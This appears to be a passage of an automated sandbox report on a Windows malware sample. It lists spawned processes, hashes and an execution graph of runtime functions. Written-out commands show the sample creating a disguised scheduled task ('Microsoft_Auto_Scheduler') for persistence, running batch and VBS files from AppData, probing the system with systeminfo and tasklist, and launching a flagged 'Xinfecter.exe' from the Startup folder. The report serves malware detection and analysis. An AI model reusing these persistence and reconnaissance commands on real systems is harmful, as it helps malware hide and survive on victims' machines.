                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:16
                                        Start time:07:51:17
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /f
                                        Imagebase:0x550000
                                        File size:187'904 bytes
                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:17
                                        Start time:07:51:18
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\cmd.exe /c echo %date%-%time%
                                        Imagebase:0x790000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:18
                                        Start time:07:51:18
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"
                                        Imagebase:0x790000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:19
                                        Start time:07:51:18
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\systeminfo.exe
                                        Wow64 process (32bit):true
                                        Commandline:systeminfo
                                        Imagebase:0x520000
                                        File size:76'800 bytes
                                        MD5 hash:36CCB1FFAFD651F64A22B5DA0A1EA5C5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:20
                                        Start time:07:51:18
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
                                        Imagebase:0x790000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:21
                                        Start time:07:51:18
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\find.exe
                                        Wow64 process (32bit):true
                                        Commandline:find /i "os name"
                                        Imagebase:0x320000
                                        File size:14'848 bytes
                                        MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:22
                                        Start time:07:51:18
                                        Start date:06/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:23
                                        Start time:07:51:18
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                                        Imagebase:0x970000
                                        File size:418'304 bytes
                                        MD5 hash:64ACA4F48771A5BA50CD50F2410632AD
                                        Has elevated privileges:true
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:24
                                        Start time:07:51:18
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
                                        Imagebase:0x790000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:25
                                        Start time:07:51:18
                                        Start date:06/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:26
                                        Start time:07:51:18
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                        Wow64 process (32bit):true
                                        Commandline:tasklist /v
                                        Imagebase:0xee0000
                                        File size:79'360 bytes
                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:27
                                        Start time:07:51:18
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\find.exe
                                        Wow64 process (32bit):true
                                        Commandline:find /I /c "dcdcf"
                                        Imagebase:0x320000
                                        File size:14'848 bytes
                                        MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:28
                                        Start time:07:51:20
                                        Start date:06/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\S-2153.bat""
                                        Imagebase:0x7ff73cba0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:29
                                        Start time:07:51:20
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"
                                        Imagebase:0x790000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:30
                                        Start time:07:51:20
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\systeminfo.exe
                                        Wow64 process (32bit):true
                                        Commandline:systeminfo
                                        Imagebase:0x520000
                                        File size:76'800 bytes
                                        MD5 hash:36CCB1FFAFD651F64A22B5DA0A1EA5C5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:31
                                        Start time:07:51:20
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\find.exe
                                        Wow64 process (32bit):true
                                        Commandline:find /i "original"
                                        Imagebase:0x320000
                                        File size:14'848 bytes
                                        MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:32
                                        Start time:07:51:20
                                        Start date:06/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:33
                                        Start time:07:51:20
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\timeout.exe
                                        Wow64 process (32bit):true
                                        Commandline:timeout /t 15 /nobreak
                                        Imagebase:0xd90000
                                        File size:25'088 bytes
                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:34
                                        Start time:07:51:20
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\cmd.exe /c ver
                                        Imagebase:0x790000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:35
                                        Start time:07:51:21
                                        Start date:06/12/2024
                                        Path:C:\Windows\System32\wscript.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
                                        Imagebase:0x7ff707060000
                                        File size:170'496 bytes
                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:36
                                        Start time:07:51:21
                                        Start date:06/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
                                        Imagebase:0x7ff73cba0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:37
                                        Start time:07:51:21
                                        Start date:06/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:38
                                        Start time:07:51:22
                                        Start date:06/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
                                        Imagebase:0x7ff73cba0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:39
                                        Start time:07:51:22
                                        Start date:06/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:40
                                        Start time:07:51:22
                                        Start date:06/12/2024
                                        Path:C:\Windows\System32\tasklist.exe
                                        Wow64 process (32bit):false
                                        Commandline:tasklist /v
                                        Imagebase:0x7ff6c6240000
                                        File size:106'496 bytes
                                        MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:41
                                        Start time:07:51:22
                                        Start date:06/12/2024
                                        Path:C:\Windows\System32\find.exe
                                        Wow64 process (32bit):false
                                        Commandline:find /I /c "dcdcf"
                                        Imagebase:0x7ff7bb170000
                                        File size:17'920 bytes
                                        MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:42
                                        Start time:07:51:28
                                        Start date:06/12/2024
                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe"
                                        Imagebase:0x5a0000
                                        File size:1'257'984 bytes
                                        MD5 hash:603B398C14FFC8C0B647C58E9886C557
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 82%, ReversingLabs
                                        Has exited:true

                                        General

                                        Target ID:43
                                        Start time:07:51:28
                                        Start date:06/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:45
                                        Start time:07:51:35
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                        Wow64 process (32bit):true
                                        Commandline:tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv
                                        Imagebase:0xee0000
                                        File size:79'360 bytes
                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:46
                                        Start time:07:51:35
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\find.exe
                                        Wow64 process (32bit):true
                                        Commandline:find /I "xKvkNk9SXR.exe"
                                        Imagebase:0x320000
                                        File size:14'848 bytes
                                        MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:47
                                        Start time:07:51:35
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\timeout.exe
                                        Wow64 process (32bit):true
                                        Commandline:timeout /t 15 /nobreak
                                        Imagebase:0xd90000
                                        File size:25'088 bytes
                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:48
                                        Start time:07:51:50
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                        Wow64 process (32bit):true
                                        Commandline:tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv
                                        Imagebase:0xee0000
                                        File size:79'360 bytes
                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:49
                                        Start time:07:51:50
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\find.exe
                                        Wow64 process (32bit):true
                                        Commandline:find /I "xKvkNk9SXR.exe"
                                        Imagebase:0x320000
                                        File size:14'848 bytes
                                        MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:50
                                        Start time:07:51:50
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\timeout.exe
                                        Wow64 process (32bit):true
                                        Commandline:timeout /t 15 /nobreak
                                        Imagebase:0xd90000
                                        File size:25'088 bytes
                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:52
                                        Start time:07:52:05
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                        Wow64 process (32bit):true
                                        Commandline:tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv
                                        Imagebase:0xee0000
                                        File size:79'360 bytes
                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:53
                                        Start time:07:52:05
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\find.exe
                                        Wow64 process (32bit):true
                                        Commandline:find /I "xKvkNk9SXR.exe"
                                        Imagebase:0x320000
                                        File size:14'848 bytes
                                        MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:54
                                        Start time:07:52:05
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\timeout.exe
                                        Wow64 process (32bit):true
                                        Commandline:timeout /t 15 /nobreak
                                        Imagebase:0xd90000
                                        File size:25'088 bytes
                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:55
                                        Start time:07:52:20
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                        Wow64 process (32bit):true
                                        Commandline:tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv
                                        Imagebase:0xee0000
                                        File size:79'360 bytes
                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:56
                                        Start time:07:52:20
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\find.exe
                                        Wow64 process (32bit):true
                                        Commandline:find /I "xKvkNk9SXR.exe"
                                        Imagebase:0x320000
                                        File size:14'848 bytes
                                        MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:57
                                        Start time:07:52:20
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\timeout.exe
                                        Wow64 process (32bit):true
                                        Commandline:timeout /t 15 /nobreak
                                        Imagebase:0xd90000
                                        File size:25'088 bytes
                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:58
                                        Start time:07:52:35
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                        Wow64 process (32bit):true
                                        Commandline:tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv
                                        Imagebase:0xee0000
                                        File size:79'360 bytes
                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:59
                                        Start time:07:52:35
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\find.exe
                                        Wow64 process (32bit):true
                                        Commandline:find /I "xKvkNk9SXR.exe"
                                        Imagebase:0x320000
                                        File size:14'848 bytes
                                        MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:60
                                        Start time:07:52:35
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\timeout.exe
                                        Wow64 process (32bit):true
                                        Commandline:timeout /t 15 /nobreak
                                        Imagebase:0xd90000
                                        File size:25'088 bytes
                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:61
                                        Start time:07:52:50
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                        Wow64 process (32bit):true
                                        Commandline:tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv
                                        Imagebase:0xee0000
                                        File size:79'360 bytes
                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:62
                                        Start time:07:52:50
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\find.exe
                                        Wow64 process (32bit):true
                                        Commandline:find /I "xKvkNk9SXR.exe"
                                        Imagebase:0x320000
                                        File size:14'848 bytes
                                        MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:4.7%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:26.3%
                                          Total number of Nodes:2000
                                          Total number of Limit Nodes:36
                                          execution_graph 109291 a772f6 109292 a77303 109291->109292 109296 a7731b 109291->109296 109348 a659b3 109292->109348 109297 a77313 109296->109297 109298 a77376 109296->109298 109352 a75b37 109296->109352 109311 a736a5 109298->109311 109301 a7738e 109318 a78990 109301->109318 109303 a77395 109303->109297 109304 a736a5 __fread_nolock 26 API calls 109303->109304 109305 a773c1 109304->109305 109305->109297 109306 a736a5 __fread_nolock 26 API calls 109305->109306 109307 a773cf 109306->109307 109307->109297 109308 a736a5 __fread_nolock 26 API calls 109307->109308 109309 a773df 109308->109309 109310 a736a5 __fread_nolock 26 API calls 109309->109310 109310->109297 109312 a736c6 109311->109312 109313 a736b1 109311->109313 109312->109301 109314 a659b3 __Stoulx 20 API calls 109313->109314 109315 a736b6 109314->109315 109357 a65122 26 API calls __wsopen_s 109315->109357 109317 a736c1 109317->109301 109319 a7899c __FrameHandler3::FrameUnwindToState 109318->109319 109320 a789a4 109319->109320 109321 a789bc 109319->109321 109424 a659a0 109320->109424 109322 a78a82 109321->109322 109327 a789f5 109321->109327 109325 a659a0 __dosmaperr 20 API calls 109322->109325 109328 a78a87 109325->109328 109326 a659b3 __Stoulx 20 API calls 109338 a789b1 __wsopen_s 109326->109338 109329 a78a04 109327->109329 109330 a78a19 109327->109330 109331 a659b3 __Stoulx 20 API calls 109328->109331 109332 a659a0 __dosmaperr 20 API calls 109329->109332 109358 a7cba4 EnterCriticalSection 109330->109358 109334 a78a11 109331->109334 109335 a78a09 109332->109335 109428 a65122 26 API calls __wsopen_s 109334->109428 109339 a659b3 __Stoulx 20 API calls 109335->109339 109336 a78a1f 109340 a78a50 109336->109340 109341 a78a3b 109336->109341 109338->109303 109339->109334 109359 a78aa3 109340->109359 109342 a659b3 __Stoulx 20 API calls 109341->109342 109344 a78a40 109342->109344 109346 a659a0 __dosmaperr 20 API calls 109344->109346 109345 a78a4b 109427 a78a7a LeaveCriticalSection __wsopen_s 109345->109427 109346->109345 109486 a743fe 20 API calls 2 library calls 109348->109486 109350 a659b8 109351 a65122 26 API calls __wsopen_s 109350->109351 109351->109297 109353 a75b94 std::_Locinfo::_W_Getdays 21 API calls 109352->109353 109354 a75b52 109353->109354 109355 a74d66 _free 20 API calls 109354->109355 109356 a75b5c 109355->109356 109356->109298 109357->109317 109358->109336 109360 a78ab5 109359->109360 109361 a78acd 109359->109361 109362 a659a0 __dosmaperr 20 API calls 109360->109362 109363 a78e37 109361->109363 109366 a78b12 109361->109366 109364 a78aba 109362->109364 109365 a659a0 __dosmaperr 20 API calls 109363->109365 109367 a659b3 __Stoulx 20 API calls 109364->109367 109368 a78e3c 109365->109368 109369 a78b1d 109366->109369 109372 a78ac2 109366->109372 109377 a78b4d 109366->109377 109367->109372 109370 a659b3 __Stoulx 20 API calls 109368->109370 109371 a659a0 __dosmaperr 20 API calls 109369->109371 109373 a78b2a 109370->109373 109374 a78b22 109371->109374 109372->109345 109458 a65122 26 API calls __wsopen_s 109373->109458 109376 a659b3 __Stoulx 20 API calls 109374->109376 109376->109373 109378 a78b66 109377->109378 109379 a78b8c 109377->109379 109380 a78ba8 109377->109380 109378->109379 109386 a78b73 109378->109386 109381 a659a0 __dosmaperr 20 API calls 109379->109381 109439 a75b94 109380->109439 109382 a78b91 109381->109382 109384 a659b3 __Stoulx 20 API calls 109382->109384 109388 a78b98 109384->109388 109429 a7fc47 109386->109429 109438 a65122 26 API calls __wsopen_s 109388->109438 109389 a78d11 109392 a78d87 109389->109392 109395 a78d2a GetConsoleMode 109389->109395 109394 a78d8b ReadFile 109392->109394 109393 a78bc8 109396 a74d66 _free 20 API calls 109393->109396 109397 a78da5 109394->109397 109398 a78dff GetLastError 109394->109398 109395->109392 109399 a78d3b 109395->109399 109400 a78bcf 109396->109400 109397->109398 109403 a78d7c 109397->109403 109401 a78d63 109398->109401 109402 a78e0c 109398->109402 109399->109394 109404 a78d41 ReadConsoleW 109399->109404 109405 a78bf4 109400->109405 109406 a78bd9 109400->109406 109421 a78ba3 __fread_nolock 109401->109421 109455 a6597d 20 API calls 3 library calls 109401->109455 109407 a659b3 __Stoulx 20 API calls 109402->109407 109417 a78de1 109403->109417 109418 a78dca 109403->109418 109403->109421 109404->109403 109409 a78d5d GetLastError 109404->109409 109452 a78ff6 109405->109452 109411 a659b3 __Stoulx 20 API calls 109406->109411 109413 a78e11 109407->109413 109409->109401 109410 a74d66 _free 20 API calls 109410->109372 109412 a78bde 109411->109412 109415 a659a0 __dosmaperr 20 API calls 109412->109415 109416 a659a0 __dosmaperr 20 API calls 109413->109416 109415->109421 109416->109421 109420 a78df8 109417->109420 109417->109421 109456 a787bf 31 API calls 3 library calls 109418->109456 109457 a785ff 29 API calls __fread_nolock 109420->109457 109421->109410 109423 a78dfd 109423->109421 109485 a743fe 20 API calls 2 library calls 109424->109485 109426 a659a5 109426->109326 109427->109338 109428->109338 109430 a7fc54 109429->109430 109431 a7fc61 109429->109431 109432 a659b3 __Stoulx 20 API calls 109430->109432 109433 a7fc6d 109431->109433 109434 a659b3 __Stoulx 20 API calls 109431->109434 109436 a7fc59 109432->109436 109433->109389 109435 a7fc8e 109434->109435 109459 a65122 26 API calls __wsopen_s 109435->109459 109436->109389 109438->109421 109440 a75bd2 109439->109440 109444 a75ba2 std::_Locinfo::_W_Getdays 109439->109444 109442 a659b3 __Stoulx 20 API calls 109440->109442 109441 a75bbd RtlAllocateHeap 109443 a75bd0 109441->109443 109441->109444 109442->109443 109446 a74d66 109443->109446 109444->109440 109444->109441 109460 a6cfdd 7 API calls 2 library calls 109444->109460 109447 a74d71 HeapFree 109446->109447 109448 a74d9a _free 109446->109448 109447->109448 109449 a74d86 109447->109449 109448->109393 109450 a659b3 __Stoulx 18 API calls 109449->109450 109451 a74d8c GetLastError 109450->109451 109451->109448 109461 a78f5d 109452->109461 109455->109421 109456->109421 109457->109423 109458->109372 109459->109436 109460->109444 109470 a7ce21 109461->109470 109463 a78f6f 109464 a78f77 109463->109464 109465 a78f88 SetFilePointerEx 109463->109465 109466 a659b3 __Stoulx 20 API calls 109464->109466 109467 a78fa0 GetLastError 109465->109467 109469 a78f7c 109465->109469 109466->109469 109483 a6597d 20 API calls 3 library calls 109467->109483 109469->109386 109471 a7ce43 109470->109471 109472 a7ce2e 109470->109472 109474 a659a0 __dosmaperr 20 API calls 109471->109474 109476 a7ce68 109471->109476 109473 a659a0 __dosmaperr 20 API calls 109472->109473 109475 a7ce33 109473->109475 109477 a7ce73 109474->109477 109478 a659b3 __Stoulx 20 API calls 109475->109478 109476->109463 109479 a659b3 __Stoulx 20 API calls 109477->109479 109480 a7ce3b 109478->109480 109481 a7ce7b 109479->109481 109480->109463 109484 a65122 26 API calls __wsopen_s 109481->109484 109483->109469 109484->109480 109485->109426 109486->109350 109487 a74af6 109492 a74680 109487->109492 109490 a74b1e 109493 a746ab 109492->109493 109500 a747f4 109493->109500 109507 a7fe56 71 API calls 2 library calls 109493->109507 109494 a659b3 __Stoulx 20 API calls 109495 a7489e 109494->109495 109510 a65122 26 API calls __wsopen_s 109495->109510 109497 a747fd 109497->109490 109504 a80670 109497->109504 109499 a7483e 109499->109500 109508 a7fe56 71 API calls 2 library calls 109499->109508 109500->109494 109500->109497 109502 a7485d 109502->109500 109509 a7fe56 71 API calls 2 library calls 109502->109509 109511 a7ff79 109504->109511 109506 a8068b 109506->109490 109507->109499 109508->109502 109509->109500 109510->109497 109514 a7ff85 __FrameHandler3::FrameUnwindToState 109511->109514 109512 a7ff93 109513 a659b3 __Stoulx 20 API calls 109512->109513 109515 a7ff98 109513->109515 109514->109512 109516 a7ffcc 109514->109516 109529 a65122 26 API calls __wsopen_s 109515->109529 109522 a8061f 109516->109522 109521 a7ffa2 __wsopen_s 109521->109506 109531 a81f96 109522->109531 109525 a7fff0 109530 a80019 LeaveCriticalSection __wsopen_s 109525->109530 109528 a74d66 _free 20 API calls 109528->109525 109529->109521 109530->109521 109532 a81fb9 109531->109532 109533 a81fa2 109531->109533 109534 a81fd8 